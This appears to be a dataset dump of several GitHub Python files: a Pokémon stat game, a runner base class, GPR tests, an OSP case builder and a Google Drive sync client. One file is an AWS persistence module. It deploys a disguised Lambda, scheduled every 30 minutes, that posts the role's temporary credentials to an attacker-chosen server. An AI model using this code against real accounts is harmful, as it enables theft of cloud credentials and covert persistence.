seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
41209430964 | import random, requests
def random_pokemon():
opponent_pokemon_number = random.randint(1, 151)
url = 'https://pokeapi.co/api/v2/pokemon/{}/'.format(opponent_pokemon_number)
response = requests.get(url)
pokemon = response.json()
return {
'name': pokemon['name'],
'id': pokemon['id'],
'height': pokemon['height'],
'weight': pokemon['weight'],
'order': pokemon['order']
}
#I am creating a best of 5 games between the player and the computer
player_wins = 0
computer_wins = 0
for wins in range(5):
print()
player_pokemon_number = input("Choose a pokemon number between 1 and 151 to pick a pokemon: ")
print()
url = 'https://pokeapi.co/api/v2/pokemon/{}/'.format(player_pokemon_number)
response = requests.get(url)
player_pokemon_number = response.json()
print("Name: " + player_pokemon_number['name'])
print("ID: " + str(player_pokemon_number['id']))
print("Height: " + str(player_pokemon_number['height']))
print("Weight: " + str(player_pokemon_number['weight']))
print("Order: " + str(player_pokemon_number['order']))
poke_stat = {
'name': player_pokemon_number['name'],
'id': player_pokemon_number['id'],
'height': player_pokemon_number['height'],
'weight': player_pokemon_number['weight'],
'order': player_pokemon_number['order']
}
print()
choose_stat: str = input('Select one stat you would like to compare between >> "id, height, weight, order: " ')
opponent_pokemon_number = random_pokemon()
print ()
print('The opponent chose {}'.format(opponent_pokemon_number['name']))
print("Name: " + opponent_pokemon_number['name'])
print("ID: " + str(opponent_pokemon_number['id']))
print("Height: " + str(opponent_pokemon_number['height']))
print("Weight: " + str(opponent_pokemon_number['weight']))
print("Order: " + str(opponent_pokemon_number['order']))
player_stat = player_pokemon_number[choose_stat]
opponent_stat = opponent_pokemon_number[choose_stat]
#CALCULATIONS
if player_stat > opponent_stat:
player_wins += 1
print("You win")
elif player_stat < opponent_stat:
computer_wins += 1
print("You lost")
else:
print('Draw!')
#FINAL RESULTS
print("Your final results:")
if player_wins >= 3:
print('CONGRATULATIONS You won {} out of 5 games'.format(player_wins))
elif computer_wins >= 3:
print('You lost, The computer won {} out of 5 games :(, try again!'.format(computer_wins))
else:
print("You won 2 games and The comuputer won 2 games, You drew") | KaraboMolale/CFG-TOP-TRUMPS | CFG_PYTHON_TOP_TRUMPS.py | CFG_PYTHON_TOP_TRUMPS.py | py | 2,624 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "random.randint",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 27,
"usage_type": "call"
}
] |
13967663676 | import boto3
import botocore
import os
import time
import zipfile
from colorama import Fore, Style
from functions import create_client
def help():
print(f"{Fore.YELLOW}\n================================================================================================{Style.RESET_ALL}")
print("[+] Module Description:\n")
print("\tThis module will create a lambda persistency that will export the temporary credentials")
print("\tfor the role attached to it to a server of your choosing.\n")
print("[+] Module Functionality:\n")
print("\tThe module will ask you for an address of a server you control, the arn of a role to be")
print("\tpassed to the new lambda function and the region to create the lambda. It then will create")
print("\tthe lambda function and assign a trigger that will execute this function every 30 minutes.\n")
print("[+] IMPORTANT:\n")
print("\tYou need the 'iam:passrole' and 'lambda:create_function' permissions.")
print(f"{Fore.YELLOW}\n================================================================================================{Style.RESET_ALL}")
def aws_file():
with open("lambda_function.zip", 'rb') as file_data:
bytes_content = file_data.read()
return bytes_content
def create_lambda(client, function_role):
response = client.create_function(
FunctionName="EventMonitorFunction",
Runtime="python3.9",
Role=function_role,
Handler="lambda_function.lambda_handler",
Code={
"ZipFile": aws_file()
},
Description="Lambda de monitoramento de Eventos do CloudWatch.",
Publish=True,
PackageType="Zip"
)
return response
def create_eventbrige_rule(client):
rule = client.put_rule(
Name='EventMonitor',
ScheduleExpression="rate(30 minutes)",
Description="Monitora eventos do CloudWath."
)
return rule
def create_lambda_file(server_address, lambda_path):
lambda_code = f"""
import json
import os
import requests
def lambda_handler(event, context):
environment = os.environ.copy()
requests.post('http://{server_address}/', json=environment, timeout=0.01)
return '200 OK'
"""
try:
print('[+] Zipping Lambda function...\n')
with zipfile.ZipFile(lambda_path, 'w', zipfile.ZIP_DEFLATED) as zip_file:
zip_file.writestr('lambda_function.py', lambda_code)
except Exception as e:
print('Failed to zip Lambda: {}\n'.format(e))
def assign_rule_target(client,function_name, function_arn):
response = client.put_targets(
Rule="EventMonitor",
Targets=[
{
'Id': function_name,
'Arn': function_arn
}
]
)
return response
def assign_trigger(client, function_name, rule_arn):
response = client.add_permission(
FunctionName=function_name,
StatementId='EventBridgeFunctionPermission',
Action='lambda:InvokeFunction',
Principal='events.amazonaws.com',
SourceArn=rule_arn
)
return response
def create_lambda_layer(client):
with open("./data/requests.zip", 'rb') as file_data:
bytes_content = file_data.read()
response = client.publish_layer_version(
LayerName='layer_requests',
Description='Used to perform standard HTTP requests.',
Content={'ZipFile': bytes_content},
CompatibleRuntimes=['python3.9']
)
return response
def check_lambda_status(client, function_name):
response = client.get_function(
FunctionName=function_name
)
if response['Configuration']['State'] == 'Active':
return True
else:
return False
def invoke_lambda(client, function_name):
response = client.invoke(
FunctionName=function_name,
)
return response
def update_layer_information(client, function_name):
response = client.update_function_configuration(
FunctionName=function_name,
Layers=[
'arn:aws:lambda:sa-east-1:601904299386:layer:layer_requests:1'
]
)
return response
def main(botoconfig, session):
results = {}
print("[+] Starting persistence module...")
function_role = input("[+] Please input the " + Fore.YELLOW + "role arn" + Style.RESET_ALL + " to be passed to the Lambda function: ")
region_name = input("[+] Please input the " + Fore.YELLOW + "region" + Style.RESET_ALL + " to be used: ")
server_address = input("[+] Please input the " + Fore.YELLOW + "server address" + Style.RESET_ALL + " to be used: ")
lambda_path = './lambda_function.zip'
print("[+] Creating Lambda file...")
create_lambda_file(server_address, lambda_path)
print("[+] Creating EventBridge Rule...")
event_client = create_client.Client(botoconfig, session, "events", region_name)
rule_data = create_eventbrige_rule(event_client.create_aws_client())
print(f"[+] Rule created: {Fore.GREEN}{rule_data['RuleArn']}{Style.RESET_ALL}")
results['RuleArn'] = rule_data['RuleArn']
print("[+] Creating Lambda Function...")
lambda_client = create_client.Client(botoconfig, session, "lambda", region_name)
function_data = create_lambda(lambda_client.create_aws_client(), function_role)
print(f"[+] Lambda created: {Fore.GREEN}{function_data['FunctionName']}{Style.RESET_ALL}")
results['FunctionName'] = function_data['FunctionName']
results['FunctionArn'] = function_data['FunctionArn']
print("[+] Assigning target to EventBridge rule...")
target = assign_rule_target(event_client.create_aws_client(), function_data['FunctionName'], function_data['FunctionArn'])
if target ['ResponseMetadata']['HTTPStatusCode'] == 200:
print(f"{Fore.GREEN}[+] Targed Successfully Assinged!{Style.RESET_ALL}")
else:
print(f"{Fore.RED}[-] Failed to assign target...{Style.RESET_ALL}")
print("[+] Assigning trigger to Lambda function...")
trigger = assign_trigger(lambda_client.create_aws_client(), function_data['FunctionName'], rule_data['RuleArn'])
if trigger['ResponseMetadata']['HTTPStatusCode'] == 201:
print(f"{Fore.GREEN}[+] Trigger set!{Style.RESET_ALL}")
else:
print(f"{Fore.RED}[-] Failed to set Trigger, attack failed...{Style.RESET_ALL}")
print("[+] Creating Lambda Layer...")
layer_client = boto3.client("lambda", config=botoconfig, region_name=region_name)
layer_information = create_lambda_layer(layer_client)
if layer_information['ResponseMetadata']['HTTPStatusCode'] == 201:
print(f"{Fore.GREEN}[+] Layer created!{Style.RESET_ALL}")
else:
print(f"{Fore.RED}[-] Failed to create layer, attack failed...{Style.RESET_ALL}")
print("[+] Checking for lambda status...")
while True:
token = check_lambda_status(layer_client, function_data['FunctionName'])
if token:
break
else:
time.sleep(10)
print("[+] Assingning Layer to Function...")
update_layer = update_layer_information(layer_client, function_data['FunctionName'])
if update_layer['ResponseMetadata']['HTTPStatusCode'] == 200:
print(f"{Fore.GREEN}[+] Layer assigned! Attack Complete!{Style.RESET_ALL}")
else:
print(f"{Fore.RED}[-] Failed to assign layer, attack failed...{Style.RESET_ALL}")
os.remove(lambda_path)
return results | MiedzinskiBuck/Kintoun | modules/persistence/lambda_export_keys.py | lambda_export_keys.py | py | 7,404 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "colorama.Fore.YELLOW",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "colorama.Fore",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "colorama.Style.RESET_ALL",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": ... |
5606726905 | from __future__ import (absolute_import, division, print_function, unicode_literals)
from builtins import *
import logging, signal, os, os.path
from wizzat.util import mkdirp, slurp
__all__ = [
'RunnerBase',
]
class RunnerBase(object):
"""
This is a base class for runners. It supports:
- Setting up logging
- Resetting logging for tests
- Signal handling
- Hooks for common operations like setup_connections or should_run
"""
log_root = '/mnt/logs'
process_name = None
log_stdout = False
sig_handlers = {
signal.SIGTERM : 'sig_term',
signal.SIGINT : 'sig_int',
signal.SIGHUP : 'sig_hup',
}
def __init__(self, **params):
self.__dict__.update(params)
self.terminated = False
self.interrupted = False
self.setup_logging()
self.setup_connections()
for sig, func in self.sig_handlers.items():
signal.signal(sig, getattr(self, func))
def run(self):
"""
This method provides should_run() and automatic exception handling/logging.
"""
if not self.should_run():
return
try:
self._run()
return self
except Exception:
logging.exception("Caught exception")
raise
def pidfile(self):
"""
This method can be overridden to return a full file path, which will be checked as a pidfile.
If the pidfile exists and the process also exists, the process will be flagged as should_run = False.
"""
return False
def check_pidfile(self):
pidfile = self.pidfile()
if pidfile:
logging.info("Checking pidfile: %s", pidfile)
mkdirp(os.path.dirname(pidfile))
if os.path.exists(pidfile):
try:
# Does the process exist and can we signal it?
pid = int(slurp(pidfile).strip())
logging.info("Pidfile %s exists, checking pid %d", pidfile, pid)
os.kill(pid, 0)
logging.info("Pidfile exists and process can be signaled, aborting")
return False
except (ValueError, OSError):
logging.info("Pidfile exists but process cannot be signaled, continuing")
logging.info("Writing new pidfile %s (%d)", pidfile, os.getpid())
with open(pidfile, 'w') as fp:
fp.write(str(os.getpid()))
return True
def setup_connections(self):
"""
Stub for overriding. Called during init()
"""
pass
def should_run(self):
"""
Should implement logic for determining whether the process should run.
Memory constraints, CPU constraints, pidfiles, etc go here.
Called before _run()
"""
if not self.check_pidfile():
return False
return True
def setup_logging(self):
cls = type(self)
self.process_name = self.process_name or "{}.{}".format(cls.__module__, cls.__name__)
if self.log_stdout:
self.log_file = None
else:
self.log_file = os.path.join(self.log_root, self.process_name + '.log')
mkdirp(self.log_root)
# http://stackoverflow.com/questions/1943747/python-logging-before-you-run-logging-basicconfig
# This lets you run these guys in tests with a different logging conf per runner
root = logging.getLogger()
if root.handlers:
for handler in root.handlers:
root.removeHandler(handler)
logging.basicConfig(
format = '%(asctime)s.%(msecs)s:%(name)s:%(thread)d:%(levelname)s:%(process)d:%(message)s',
filename = self.log_file,
level = logging.INFO,
)
def sig_term(self, signal, frame):
"""
By default, sig_term sets the `terminated` flag. This can be used for main loop control.
"""
logging.critical('Received sigterm')
self.terminated = True
def sig_int(self, signal, frame):
"""
By default, sig_int sets the `interrupted` flag. This can be used for main loop control.
"""
logging.critical('Received sigint')
self.interrupted = True
def sig_hup(self, signal, frame):
"""
By default, sig_hup will close and reopen log files (for log rotation)
"""
logging.critical('Received sighup')
self.setup_logging()
| wizzat/wizzat.py | wizzat/runner.py | runner.py | py | 4,577 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "signal.SIGTERM",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "signal.SIGINT",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "signal.SIGHUP",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "signal.sign... |
26807859600 | import os
import sys
import numpy as np
import pytest
from numpy.random import rand
sys.path.append(os.path.join(os.path.dirname(__file__), "../.."))
module = __import__("Models", fromlist=["GPR"])
class TestGPR:
@pytest.mark.skip
def test_getPredictValue(self, x):
...
@pytest.mark.skip
def test_getPredictDistribution(self, x):
...
@pytest.mark.parametrize(
("dim", "obj", "num"),
[(3, 2, 10), (5, 3, 10), (10, 10, 10), (5, 5, 20), (10, 10, 50)],
)
def test_getPredictDistributionAll_random(self, dim, obj, num):
x = np.array([[rand() for _ in range(dim)] for __ in range(num)])
y = np.array([rand() for _ in range(num)])
model = module.GPR.GPR(x, y)
p = np.array([[rand() for _ in range(dim)] for __ in range(num)])
mvL = model.getPredictDistributionAll(p)
for t, mv in zip(p, mvL):
m, v = model.getPredictDistribution(t)
assert np.abs(m - mv[0]) < 1e-5
assert np.abs(v - mv[1]) < 1e-5
@pytest.mark.parametrize(
("dim", "obj", "num"),
[(3, 2, 10), (5, 3, 10), (10, 10, 10), (5, 5, 20), (10, 10, 50)],
)
def test_getPredictValueAll_random(self, dim, obj, num):
x = np.array([[rand() for _ in range(dim)] for __ in range(num)])
y = np.array([rand() for _ in range(num)])
model = module.GPR.GPR(x, y)
p = np.array([[rand() for _ in range(dim)] for __ in range(num)])
vL = model.getPredictValueAll(p)
for t, v in zip(p, vL):
v2 = model.getPredictValue(t)
assert np.abs(v - v2) < 1e-5
| mit17024317/2020-0730 | Optimizer/Models/test/test_GPR.py | test_GPR.py | py | 1,642 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": ... |
72436648354 | import logging
import os
from pathlib import Path
from typing import Union
from dictIO import CppDict, DictReader
from ospx import Graph, OspSimulationCase
__ALL__ = ["OspCaseBuilder"]
logger = logging.getLogger(__name__)
class OspCaseBuilder:
"""Builder for OSP-specific configuration files needed to run an OSP (co-)simulation case."""
def __init__(self):
return
@staticmethod
def build(
case_dict_file: Union[str, os.PathLike[str]],
inspect: bool = False,
graph: bool = False,
clean: bool = False,
):
"""Build the OSP-specific configuration files needed to run an OSP (co-)simulation case.
Builds following files:
- OspSystemStructure.xml
- SystemStructure.ssd
- Plot.json
- statisticsDict
- watchDict
Parameters
----------
case_dict_file : Union[str, os.PathLike[str]]
caseDict file. Contains all case-specific information OspCaseBuilder needs to generate the OSP files.
inspect : bool, optional
inspect mode. If True, build() reads all properties from the FMUs but does not actually create the OSP case files, by default False
graph : bool, optional
if True, creates a dependency graph image using graphviz, by default False
clean : bool, optional
if True, cleans up case folder and deletes any formerly created ospx files, e.g. OspSystemStructure.xml .fmu .csv etc.
Raises
------
FileNotFoundError
if case_dict_file does not exist
"""
# Make sure source_file argument is of type Path. If not, cast it to Path type.
case_dict_file = case_dict_file if isinstance(case_dict_file, Path) else Path(case_dict_file)
if not case_dict_file.exists():
logger.error(f"OspCaseBuilder: File {case_dict_file} not found.")
raise FileNotFoundError(case_dict_file)
if clean:
case_folder: Path = case_dict_file.resolve().parent
_clean_case_folder(case_folder)
logger.info(f"reading {case_dict_file}") # 0
case_dict: CppDict = DictReader.read(case_dict_file, comments=False)
case = OspSimulationCase(case_dict)
try:
case.setup()
except Exception as e:
logger.exception(e)
return
if inspect:
# inspect and return
case._inspect() # pyright: ignore
return
# case.write_osp_model_description_xmls()
case.write_osp_system_structure_xml()
case.write_system_structure_ssd()
if "postProcessing" in case_dict.keys():
case._write_plot_config_json() # pyright: ignore
case.write_statistics_dict()
if graph:
Graph.generate_dependency_graph(case)
case.write_watch_dict()
return
def _clean_case_folder(case_folder: Path):
"""Clean up the case folder and deletes any existing ospx files, e.g. modelDescription.xml .fmu .csv etc."""
import re
from shutil import rmtree
# specify all files to be deleted (or comment-in / comment-out as needed)
case_builder_result_files = [
"*.csv",
"*.out",
"*.xml",
"*.ssd",
"*.fmu",
"*callGraph",
"*.pdf",
"*.png", # 'protect results/*.png'
"watchDict",
"statisticsDict", # 'results',
"zip",
]
except_list = ["src", "^test_", "_OspModelDescription.xml"]
except_pattern = "(" + "|".join(except_list) + ")"
logger.info(f"Clean OSP simulation case folder: {case_folder}")
for pattern in case_builder_result_files:
files = list(case_folder.rglob(pattern))
for file in files:
if not re.search(except_pattern, str(file)):
# logger.info("%s in list to clean" % file)
if file.is_file():
# logger.info("file %s cleaned" % file)
file.unlink(missing_ok=True)
else:
# logger.info("dir %s removed" % file)
rmtree(file)
return
| dnv-opensource/ospx | src/ospx/ospCaseBuilder.py | ospCaseBuilder.py | py | 4,204 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "typing.Union",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "os.PathLike",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "pathlib.Path",
"l... |
4700100069 | # system imports
import logging
import sys
import os
import io
import concurrent.futures
import shutil
from time import sleep
#import keyring
# google and http imports
from google.auth.transport.requests import Request
from google.oauth2.credentials import Credentials
from google_auth_oauthlib.flow import InstalledAppFlow
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from googleapiclient.http import MediaIoBaseDownload
from googleapiclient.http import MediaFileUpload
import googleapiclient
import google_auth_httplib2
import httplib2
from googleapiclient import discovery
# application imports
current = os.path.dirname(os.path.realpath(__file__))
parent = os.path.dirname(current)
sys.path.append(parent)
from libdata.data_types import *
from libdata.sqlite_store import *
from lib import mods
from lib import keyring
from lib import filewatcher
from config import config as cfg
#from lib.mods import *
# data structure for queueing changes
"""
class Change:
def __init__(self, change: str = "", src_object=None, dst_object=None, type="", retry=0):
if change not in ['modified', 'created', 'deleted', 'moved', 'closed']:
raise "Invalid change type '%s'" % change
if type not in ['file', 'directory']:
raise "Invalid change type '%s'" % type
self.change_type = change
self.object_type=type
self.change_object = src_object
self.dst_object = dst_object
self.retry = retry
"""
def test_func():
print("test function called")
def login_to_drive():
logging.info("initializing application credentials")
creds = None
# The file token.json stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if cfg.USE_KEYRING == True:
kr = keyring.Keyring()
else:
kr = None
if cfg.USE_KEYRING == True:
logging.debug("looking for and existing token in the OS keyring")
try:
tokenStr = kr.get_data("gdrive", "token")
if tokenStr is not None and tokenStr != "":
tokenStr = json.loads(tokenStr)
if tokenStr['scopes'] != cfg.TARGET_SCOPES:
creds = None
kr.delete_data("gdrive", "token")
else:
creds = Credentials.from_authorized_user_info(tokenStr, cfg.TARGET_SCOPES)
except Exception as err:
logging.error("Unable to fetch the oauth token from the OS keyring. %s" % str(err))
else:
logging.debug("looking for an existing token in" + cfg.TOKEN_CACHE)
if os.path.exists(cfg.TOKEN_CACHE):
creds = Credentials.from_authorized_user_file(cfg.TOKEN_CACHE, cfg.TARGET_SCOPES)
with open(cfg.TOKEN_CACHE, 'r') as tokenFile:
token = json.loads(tokenFile.read())
if token['scopes'] != cfg.TARGET_SCOPES:
logging.warning("token cache scopes are not valid, removing token")
creds = None
os.remove(cfg.TOKEN_CACHE)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
logging.warning("valid credentials weren't found, initializing oauth consent from in default browser.")
try:
if creds and creds.expired and creds.refresh_token:
try:
creds.refresh(Request())
except HttpError as err:
logging.error("error logging in to google drive. %s" % str(err))
except Exception as err:
# if refersh token expired, remove the token cache and rerun self
if 'invalid_grant: Token has been expired or revoked.' in err.args[0]:
logging.warning("oauth refresh token expired, clearing token cache.")
if cfg.USE_KEYRING == True:
kr.delete_data("gdrive", "token")
else:
os.remove(cfg.TOKEN_CACHE)
login_to_drive()
return
logging.error("error logging in to Google Drive. %s" % str(err))
else:
flow = InstalledAppFlow.from_client_secrets_file(cfg.APP_CREDS, cfg.TARGET_SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
if cfg.USE_KEYRING == True:
kr.store_data("gdrive", "token", creds.to_json())
else:
with open(cfg.TOKEN_CACHE, 'w+') as token:
logging.debug("saving credentials to " + cfg.TOKEN_CACHE)
token.write(creds.to_json())
except HttpError as err:
print(err)
return creds
# Create a new Http() object for every request
# https://googleapis.github.io/google-api-python-client/docs/thread_safety.html
# overrides the constructor of the http2 object
def build_request(http, *args, **kwargs):
new_http = google_auth_httplib2.AuthorizedHttp(cfg.CREDENTIALS, http=httplib2.Http())
return googleapiclient.http.HttpRequest(new_http, *args, **kwargs)
# get the root folder
def get_root_folder(service) -> gFolder:
logging.debug("fetching the root folder")
rootFolder = None
try:
gServiceFiles = service.files()
params = { "fileId": 'root'
}
request = gServiceFiles.get(**params)
rootFolderResult =request.execute()
rootFolder = gFolder(rootFolderResult)
except HttpError as err:
logging.error("error fetching the root folder." + str(err))
print(err)
return rootFolder
# print out the google drive folder tree (won't be used in production)
def print_folder_tree(folders = None):
# grab the root folder
rootFolder = list(filter(lambda rf: rf.id == cfg.ROOT_FOLDER_ID, folders))
#print(rootFolder[0]['name'])
def printTree(parent, level=0):
print("-" * level + parent.name)
for child in parent.children:
printTree(child, level+1)
#printTree(folders, rootFolder[0], 0)
printTree(rootFolder[0], 0)
return
def get_full_folder_path(service, folder: gFolder)-> str:
full_path = str(folder.name)
try:
if 'parents' in folder.properties.keys():
gServiceFiles = service.files()
params = { "fileId": folder.properties['parents'][0], "fields": "parents, mimeType, id, name, ownedByMe"}
request = gServiceFiles.get(**params)
parent = request.execute()
full_path = parent['name'] + "/" + full_path
while 'parents' in parent.keys():
params = { "fileId": parent['parents'][0], "fields": "parents, mimeType, id, name, ownedByMe"}
request = gServiceFiles.get(**params)
parent = request.execute()
full_path = parent['name'] + "/" + full_path
if parent['ownedByMe'] == False:
# a folder shared outside of the current owner for the drive object.
# stick in the root folder
full_path = "_shared_withme/" + full_path
else:
if folder.properties['ownedByMe'] == False:
full_path = "_shared_withme/" + full_path
except Exception as err:
logging.error("Error getting full local path for folder id %s. %s" % (folder.id, str(err)))
print(str(err))
return full_path
# download a single file (will be called multi-threaded)
def download_file(service, file: gFile, targetPath:str, threadSafeDB:sqlite_store = None):
logging.debug("beginning to download file %s", file.name)
sReturn = ""
try:
gServiceFiles = service.files()
params = { "fileId": file.id,
"acknowledgeAbuse": True
}
request = gServiceFiles.get_media(**params)
fileData = io.BytesIO()
downloader = MediaIoBaseDownload(fileData, request)
done = False
logging.info("downloading file %s." % targetPath)
#print("downloading file %s." % targetPath)
fileDir = os.path.dirname(targetPath)
if not os.path.exists(fileDir):
logging.debug("file's parent directory '%s' doesn't exist, creating." % fileDir)
os.makedirs(os.path.expanduser(fileDir))
while done is False:
status, done = downloader.next_chunk()
#print(F'Download {int(status.progress() * 100)}.')
with open(targetPath, "wb+") as f:
f.write(fileData.getbuffer())
file.localPath = targetPath
file.md5 = mods.hash_file(targetPath)
# update the file timestamp to match what's in Drive
mod_time = int(datetime.datetime.strptime(file.properties['modifiedTime'][:-5], '%Y-%m-%dT%H:%M:%S').strftime("%s"))
os.utime(targetPath, (mod_time, mod_time))
if threadSafeDB is not None:
threadSafeDB.insert_gObject(file=file)
else:
cfg.DATABASE.insert_gObject(file=file)
fileSize = os.path.getsize(targetPath)
sReturn = "file %s written %d byes." % (targetPath, fileSize)
except HttpError as err:
logging.error("error downloading file. %s" % str(err))
print(err)
sReturn = "file %s download failed with %s" % (targetPath, str(err))
except Exception as err:
logging.error("error downloading file. %s" % str(err))
print(err)
sReturn = "file %s download failed with %s" % (targetPath, str(err))
return sReturn
# export a native google document format (can't be downloaded)
def export_native_file(service, file: gFile, targetPath: str)-> bool:
logging.debug("exporting the native google application file %s.", file.name)
bSuccess = False
try:
gServiceFiles = service.files()
# get type of application
targetMimeType = None
if file.properties['mimeType'] in cfg.MEDIA_EXPORT_MATRIX.keys():
targetMimeType = cfg.MEDIA_EXPORT_MATRIX[file.properties['mimeType']]["targetMimeType"]
targetExtension = cfg.MEDIA_EXPORT_MATRIX[file.properties['mimeType']]["extension"]
targetPath = targetPath + targetExtension
if targetMimeType is None:
return False
params = { "fileId": file.id,
"mimeType": targetMimeType
}
request = gServiceFiles.export_media(**params)
fileData = io.BytesIO()
downloader = MediaIoBaseDownload(fileData, request)
done = False
while done is False:
status, done = downloader.next_chunk()
print(F'Download {int(status.progress() * 100)}.')
with open(targetPath, "wb+") as f:
f.write(fileData.getbuffer())
except HttpError as err:
logging.error("error exporting google application file. %s", str(err))
print(err)
bSuccess = False
return bSuccess
# return a listing of files in a directory (non-recursive)
def list_files_in_dir(service, folder:gFolder, maxFiles = 1000) -> List[gFile]:
logging.debug("listing files in %s directory", folder.name)
files = []
try:
gServiceFiles = service.files()
params = { "q": "mimeType!='application/vnd.google-apps.folder' and '" +
folder.id + "' in parents",
"pageSize": cfg.PAGE_SIZE,
"fields": "nextPageToken," + cfg.FILE_FIELDS
}
request = gServiceFiles.list(**params)
while (request is not None) and len(files) <= maxFiles:
files_page = request.execute()
fs = files_page.get('files', [])
for f in fs:
objFile = gFile(f)
objFile.md5 = None
files.append(objFile)
request = gServiceFiles.list_next(request, files_page)
except HttpError as err:
logging.error("error listing files." + str(err))
print(err)
return files
# download all files in a folder (non-recursive)
def download_files_from_folder(service, folder: gFolder, targetDir: str) -> bool:
logging.debug("starting to download files from %s to %s" % (folder.name, targetDir))
bResult = False
try:
files = list_files_in_dir(service, folder)
# the google api module isn't thread safe, since it's based on http2 which also isn't thread safe
# https://googleapis.github.io/google-api-python-client/docs/thread_safety.html
with concurrent.futures.ThreadPoolExecutor(max_workers=cfg.MAX_THREADS) as executor:
futures = []
for f in files:
if not "application/vnd.google-apps" in f.properties['mimeType']:
filePath = os.path.join(targetDir, folder.name, f.name)
# build a new http2 object to enable thread safety. gets passed to each thread
credentials = Credentials.from_authorized_user_file(cfg.TOKEN_CACHE, cfg.TARGET_SCOPES)
authorized_http = google_auth_httplib2.AuthorizedHttp(credentials, http=httplib2.Http())
service = discovery.build('drive', 'v3', requestBuilder=build_request, http=authorized_http)
# build new database object for multi-threading too
threadSafeDB = sqlite_store()
threadSafeDB.open(cfg.DATABASE_PATH)
futures.append(executor.submit(
download_file, service, f, filePath, threadSafeDB
))
for future in concurrent.futures.as_completed(futures):
result = future.result()
logging.debug("Download result: %s" % str(result))
#wait(futures) # want to make sure we don't start too many threads
except Exception as err:
logging.error("error downloading directory %s. %s." % (folder.name, str(err)))
bResult = False
return bResult
def write_folder_cache(service, localCachePath:str = cfg.FOLDERS_CACHE_PATH):
logging.debug("writing local folder cache to %s." % str(localCachePath))
try:
# get the root folder
gServiceFiles = service.files()
if not cfg.ROOT_FOLDER_OBJECT:
request = gServiceFiles.get(fileId = 'root')
rootFolder = request.execute()
else:
rootFolder = cfg.ROOT_FOLDER_OBJECT.properties
fRootFolder = open(cfg.FOLDERS_CACHE_PATH + "_root", "w+")
fRootFolder.write(json.dumps(rootFolder, indent = 4))
fRootFolder.close()
#global ROOT_FOLDER_ID
if cfg.ROOT_FOLDER_ID == '':
cfg.ROOT_FOLDER_ID = rootFolder['id']
#print('List files')
pageToken = None
params = { "q": "mimeType='application/vnd.google-apps.folder'",
"pageSize": cfg.PAGE_SIZE,
"fields": "nextPageToken," + cfg.FOLDER_FIELDS
}
request = gServiceFiles.list(**params)
while request is not None:
files_page = request.execute()
fs = files_page.get('files', [])
for f in fs:
#print(f)
with open(cfg.FOLDERS_CACHE_PATH + f['id'], 'w+') as folder_data:
folderObj = gFolder(f)
folderObj.localPath = os.path.join(cfg.DRIVE_CACHE_PATH, get_full_folder_path(service, folderObj))
cfg.DATABASE.insert_gObject(folder=folderObj)
if 'parents' in folderObj.properties.keys():
cfg.DATABASE.insert_parents(folderObj.id, folderObj.properties['parents'])
folder_data.write(json.dumps(f, indent=5))
folder_data.close()
request = gServiceFiles.list_next(request, files_page)
except HttpError as err:
logging.error("error writing local folder cache. %s", str(err))
print(err)
# full sync down
def do_full_download(service, folder: gFolder, targetPath:str):
logging.debug("starting full download from google drive to %s" % targetPath)
try:
download_files_from_folder(service, folder, os.path.join(targetPath))
if folder.children is not None:
for child in folder.children:
do_full_download(service, child, os.path.join(targetPath, folder.name))
except Exception as err:
logging.error("error writing local folder cache. %s" % str(err))
print(str(err))
# retrieve the metadata for Google object (file or folder)
def get_drive_object(service, id:str):
return_object = None
try:
gServiceFiles = service.files()
params = { "fileId": id,
"fields": "*"
}
request = gServiceFiles.get(**params)
object = request.execute()
if object is not None:
if object['mimeType'] == 'application/vnd.google-apps.folder':
return_object = gFolder(object)
else:
return_object = gFile(object)
except HttpError as err:
logging.error("Unable to fetch metadata from google drive for object id %s. %s" % (id, str(err)))
except Exception as err:
logging.error("Unable to fetch metadata from google drive for object id %s. %s" % (id, str(err)))
return return_object
# create folder in Google Drive
def create_drive_folder(service, folderName:str, localPath:str, parentId:str=None) -> gFolder:
folder = None
try:
if parentId is None or parentId == "":
parentId = cfg.ROOT_FOLDER_ID
file_metadata = {
'name': folderName,
'mimeType': 'application/vnd.google-apps.folder',
'parents': parentId
}
logging.info("creating folder %s in Google Drive" % folderName)
f = service.files().create(body=file_metadata, fields='*').execute()
folder = gFolder(f)
folder.localPath = localPath
cfg.DATABASE.insert_gObject(folder=folder)
except HttpError as err:
logging.error("error creating Google Drive folder. %s" % str(err))
except Exception as err:
logging.error("error creating Google Drive folder. %s" % str(err))
return folder
# create the entire folder tree, if any part doesn't exist
def create_drive_folder_tree(service, folderPath:str) -> gFolder:
parentFolder = None
try:
if cfg.DRIVE_CACHE_PATH not in cfg.ROOT_FOLDER_OBJECT.localPath:
raise "folder path isn't the defined drive cache path."
return
folderPath = folderPath.replace(cfg.ROOT_FOLDER_OBJECT.localPath + "/", "")
folders = folderPath.split(os.sep)
parent = cfg.ROOT_FOLDER_OBJECT
currentFolder = cfg.ROOT_FOLDER_OBJECT.localPath
for folder in folders:
currentFolder = os.path.join(currentFolder, folder)
